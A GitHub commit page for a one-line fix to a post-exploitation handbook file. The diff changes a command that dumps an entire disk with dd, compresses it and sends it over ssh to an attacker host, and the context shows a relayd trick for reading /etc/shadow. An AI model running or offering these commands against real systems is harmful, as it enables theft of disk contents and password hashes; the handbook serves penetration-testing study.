Skip to content

Commit

Permalink
fixed remote image dumping
Browse files Browse the repository at this point in the history
  • Loading branch information
Vanguard1105 committed Aug 7, 2024
1 parent 1594a01 commit ceedee1
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion handbooks/10_post_exploitation.md
Original file line number Diff line number Diff line change
Expand Up @@ -5036,7 +5036,7 @@ $ /usr/sbin/relayd -C /etc/shadow
### Dumping Disk Image
```c
$ dd if=/proc/<PID>/root/sda bs=512 | gzip -1 - | ssh <USERNAME>@<LHOST> 'dd of=/home/<USERNAME>/image.gz'
$ dd if=/dev/sda bs=512 | gzip -1 - | ssh <USERNAME>@<LHOST> 'dd of=/home/<USERNAME>/image.gz'
```
### Mounting the Image
Expand Down

0 comments on commit ceedee1

Please sign in to comment.